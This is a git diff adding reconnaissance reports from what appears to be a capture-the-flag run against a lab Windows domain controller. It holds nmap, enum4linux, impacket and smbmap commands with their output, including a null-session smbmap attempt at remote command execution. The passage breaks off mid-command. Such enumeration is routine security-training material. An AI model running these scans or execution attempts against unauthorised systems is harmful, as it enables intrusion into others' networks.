@@ -0,0 +1,82 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml 10.129.243.131 +adjust_timeouts2: packet supposedly had rtt of 9072738 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9072738 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9146057 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9146057 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9198674 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9198674 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9287917 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9287917 microseconds. Ignoring time. +Nmap scan report for 10.129.243.131 +Host is up, received user-set (0.046s latency). 
+Scanned at 2023-10-28 13:45:20 CEST for 873s +Not shown: 65516 filtered tcp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/tcp open domain syn-ack ttl 127 Simple DNS Plus +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +|_http-server-header: Microsoft-IIS/10.0 +| http-methods: +|_ Supported Methods: GET HEAD OPTIONS +|_http-title: Slandovia Energy +88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:58:41Z) +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? syn-ack ttl 127 +464/tcp open kpasswd5? syn-ack ttl 127 +593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped syn-ack ttl 127 +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped syn-ack ttl 127 +5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +|_http-server-header: Microsoft-HTTPAPI/2.0 +|_http-title: Not Found +9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing +49667/tcp open unknown syn-ack ttl 127 +49673/tcp open unknown syn-ack ttl 127 +49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +49695/tcp open unknown syn-ack ttl 127 +49843/tcp open unknown syn-ack ttl 127 +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Device type: WAP|phone +Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded +OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz +OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone +TCP/IP fingerprint: 
+OS:SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%G=N%TM=653CF7B9%P=x86_64-pc-l +OS:inux-gnu)ECN(R=N)T1(R=N)T2(R=N)T3(R=N)T4(R=N)U1(R=N)IE(R=N) + +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +|_clock-skew: 59m59s +| p2p-conficker: +| Checking for Conficker.C or higher... +| Check 1 (port 25314/tcp): CLEAN (Timeout) +| Check 2 (port 10793/tcp): CLEAN (Timeout) +| Check 3 (port 25536/udp): CLEAN (Timeout) +| Check 4 (port 25523/udp): CLEAN (Timeout) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked +| smb2-security-mode: +| 311: +|_ Message signing enabled and required +| smb2-time: +| date: 2023-10-28T12:59:18 +|_ start_date: N/A + +TRACEROUTE (using port 80/tcp) +HOP RTT ADDRESS +1 ... 30 + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:59:53 2023 -- 1 IP address (1 host up) scanned in 887.79 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top 100 UDP Ports.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top 100 UDP Ports.md new file mode 100644 index 00000000..3de2cdcc --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top 100 UDP Ports.md 
@@ -0,0 +1,51 @@ +```bash +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set (0.093s latency). +Scanned at 2023-10-28 13:45:07 CEST for 1811s +Not shown: 98 open|filtered udp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/udp open domain? udp-response ttl 127 +| fingerprint-strings: +| DNS-SD: +| _services +| _dns-sd +| _udp +|_ local +123/udp open ntp? script-set +| ntp-info: +|_ receive time stamp: 2023-10-28T12:52:08 +1 service unrecognized despite returning data. 
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CF493%P=x86_64-pc-linux-gnu%r(DNS +SF:-SD,2E,"\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_udp\x0 +SF:5local\0\0\x0c\0\x01")%r(Citrix,1E,"\x1e\0\x81\x01\x02\xfd\xa8\xe3\0\0\ +SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"); +Too many fingerprints match this host to give specific OS details +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=%CT=%CU=%PV=Y%DS=10%DC=T%G=N%TM=653CFB56%P=x86_64-pc-linux-gnu) +SEQ(II=I) +U1(R=N) +IE(R=Y%DFI=N%TG=80%CD=Z) + +Network Distance: 10 hops + +Host script results: +|_clock-skew: 1h00m07s + +TRACEROUTE (using port 53/udp) +HOP RTT ADDRESS +1 36.79 ms 10.10.14.1 +2 ... 9 +10 35.90 ms 10.129.243.131 + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:15:18 2023 -- 1 IP address (1 host up) scanned in 1812.34 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top TCP Ports.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top TCP Ports.md new file mode 100644 index 00000000..5dd272d2 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top TCP Ports.md 
@@ -0,0 +1,81 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml 10.129.243.131 +Increasing send delay for 10.129.243.131 from 0 to 5 due to 11 out of 20 dropped probes since last increase. +Nmap scan report for 10.129.243.131 +Host is up, received user-set (0.14s latency). +Scanned at 2023-10-28 13:45:20 CEST for 264s +Not shown: 988 filtered tcp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/tcp open domain syn-ack ttl 127 Simple DNS Plus +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +|_http-title: Slandovia Energy +| http-methods: +| Supported Methods: OPTIONS TRACE GET HEAD POST +|_ Potentially risky methods: TRACE +88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:47:30Z) +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? syn-ack ttl 127 +464/tcp open kpasswd5? 
syn-ack ttl 127 +593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped syn-ack ttl 127 +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped syn-ack ttl 127 +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Device type: specialized +Running (JUST GUESSING): AVtech embedded (87%) +OS fingerprint not ideal because: Missing a closed TCP port so results incomplete +Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%) +No exact OS matches for host (test conditions non-ideal). +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CF558%P=x86_64-pc-linux-gnu) +SEQ(SP=103%GCD=1%ISR=109%TI=RD%TS=U) +OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS) +WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70) +ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=) +T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=) +T2(R=N) +T3(R=N) +T4(R=N) +U1(R=N) +IE(R=Y%DFI=N%TG=80%CD=Z) +IE(R=N) + +Network Distance: 2 hops +TCP Sequence Prediction: Difficulty=258 (Good luck!) +IP ID Sequence Generation: Randomized +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +| smb2-security-mode: +| 311: +|_ Message signing enabled and required +|_clock-skew: 59m57s +| smb2-time: +| date: 2023-10-28T12:49:11 +|_ start_date: N/A +| p2p-conficker: +| Checking for Conficker.C or higher... 
+| Check 1 (port 25314/tcp): CLEAN (Timeout) +| Check 2 (port 10793/tcp): CLEAN (Timeout) +| Check 3 (port 25536/udp): CLEAN (Timeout) +| Check 4 (port 25523/udp): CLEAN (Timeout) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked + +TRACEROUTE (using port 135/tcp) +HOP RTT ADDRESS +1 191.57 ms 10.10.14.1 +2 183.81 ms 10.129.243.131 + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:44 2023 -- 1 IP address (1 host up) scanned in 278.93 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/Nmap MSRPC.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/Nmap MSRPC.md new file mode 100644 index 00000000..de4e959f --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/Nmap MSRPC.md 
@@ -0,0 +1,20 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131
+```
+
+[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 135 --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml 10.129.243.131
+Nmap scan report for 10.129.243.131
+Host is up, received user-set.
+Scanned at 2023-10-28 13:49:47 CEST for 1s
+
+PORT STATE SERVICE REASON VERSION
+135/tcp filtered msrpc no-response
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Oct 28 13:49:48 2023 -- 1 IP address (1 host up) scanned in 3.66 seconds
+
+```
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/get-arch.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/get-arch.md
new file mode 100644
index 00000000..acaf919b
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/get-arch.md
@@ -0,0 +1,15 @@
+```bash
+impacket-getArch -target 10.129.243.131
+```
+
+[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt):
+
+```
+Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
+
+[*] Gathering OS architecture for 1 machines
+[*] Socket connect timeout set to 2 secs
+[-] 10.129.243.131: Could not connect: timed out
+
+
+```
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/rpcdump.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/rpcdump.md
new file mode 100644
index 00000000..88f7b518
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/rpcdump.md
@@ -0,0 +1,15 @@
+```bash
+impacket-rpcdump -port 135 10.129.243.131
+```
+
+[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt):
+
+```
+Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
+
+[*] Retrieving endpoint list from 10.129.243.131
+[-] Protocol failed: Could not connect: timed out
+[*] No endpoints found.
+
+
+```
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Enum4Linux.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Enum4Linux.md
new file mode 100644
index 00000000..fd69450e
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Enum4Linux.md
@@ -0,0 +1,148 @@ +```bash +enum4linux -a -M -l -d 10.129.243.131 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt): + +``` +Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 28 13:49:45 2023 + + =========================================( Target Information )========================================= + +Target ........... 10.129.243.131 +RID Range ........ 500-550,1000-1050 +Username ......... '' +Password ......... '' +Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none + + + ===========================( Enumerating Workgroup/Domain on 10.129.243.131 )=========================== + + +[E] Can't find workgroup/domain + + + + ===============================( Nbtstat Information for 10.129.243.131 )=============================== + +Looking up status of 10.129.243.131 +No reply from 10.129.243.131 + + ==================================( Session Check on 10.129.243.131 )================================== + + +[+] Server 10.129.243.131 allows sessions using username '', password '' + + + ==========================( Getting information via LDAP for 10.129.243.131 )========================== + + +[+] 10.129.243.131 appears to be a child DC + + + ===============================( Getting domain SID for 10.129.243.131 )=============================== + +Domain Name: MEGACORP +Domain Sid: S-1-5-21-855300830-391258870-456067225 + +[+] Host is part of a domain (not a workgroup) + + + ==================================( OS information on 10.129.243.131 )================================== + + +[E] Can't get OS info with smbclient + + +[+] Got OS info for 10.129.243.131 from srvinfo: +do_cmd: Could not initialise srvsvc. 
Error was NT_STATUS_ACCESS_DENIED + + + ======================================( Users on 10.129.243.131 )====================================== + + +[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED + + + +[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED + + + ===============================( Machine Enumeration on 10.129.243.131 )=============================== + + +[E] Not implemented in this version of enum4linux. + + + ================================( Share Enumeration on 10.129.243.131 )================================ + +do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) + + Sharename Type Comment + --------- ---- ------- +Reconnecting with SMB1 for workgroup listing. +Unable to connect with SMB1 -- no workgroup available + +[+] Attempting to map shares on 10.129.243.131 + + + ===========================( Password Policy Information for 10.129.243.131 )=========================== + + +[E] Unexpected error from polenum: + + + +[+] Attaching to 10.129.243.131 using a NULL share + +[+] Trying protocol 139/SMB... + + [!] Protocol failed: Cannot request session (Called Name:10.129.243.131) + +[+] Trying protocol 445/SMB... + + [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. + + + +[E] Failed to get password policy with rpcclient + + + + ======================================( Groups on 10.129.243.131 )====================================== + + +[+] Getting builtin groups: + + +[+]  Getting builtin group memberships: + + +[+]  Getting local groups: + + +[+]  Getting local group memberships: + + +[+]  Getting domain groups: + + +[+]  Getting domain group memberships: + + + =================( Users on 10.129.243.131 via RID cycling (RIDS: 500-550,1000-1050) )================= + + +[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. 
+ + + ==============================( Getting printer info for 10.129.243.131 )============================== + +do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED + + +enum4linux complete on Sat Oct 28 13:50:18 2023 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Nmap SMB.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Nmap SMB.md new file mode 100644 index 00000000..24602ad0 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Nmap SMB.md 
@@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 139 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 2s + +PORT STATE SERVICE REASON VERSION +139/tcp filtered netbios-ssn no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.71 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBClient.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBClient.md new file mode 100644 index 00000000..9a48faf8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBClient.md 
@@ -0,0 +1,11 @@
+```bash
+smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1
+```
+
+[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt):
+
+```
+do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_IO_TIMEOUT)
+
+
+```
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBMap.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBMap.md
new file mode 100644
index 00000000..75ac190d
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBMap.md
@@ -0,0 +1,66 @@ +```bash +smbmap -H 10.129.243.131 -P 139 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 139 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... 
+ + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/nbtscan.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/nbtscan.md new file mode 100644 index 00000000..40db1a61 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/nbtscan.md @@ -0,0 +1,12 @@ +```bash +nbtscan -rvh 10.129.243.131 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt): + +``` +Doing NBT name scan for addresses from 10.129.243.131 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-3268-ldap/Nmap LDAP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-3268-ldap/Nmap LDAP.md new file mode 100644 index 00000000..62c0a399 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-3268-ldap/Nmap LDAP.md 
@@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 3268 "--script=banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt -oX 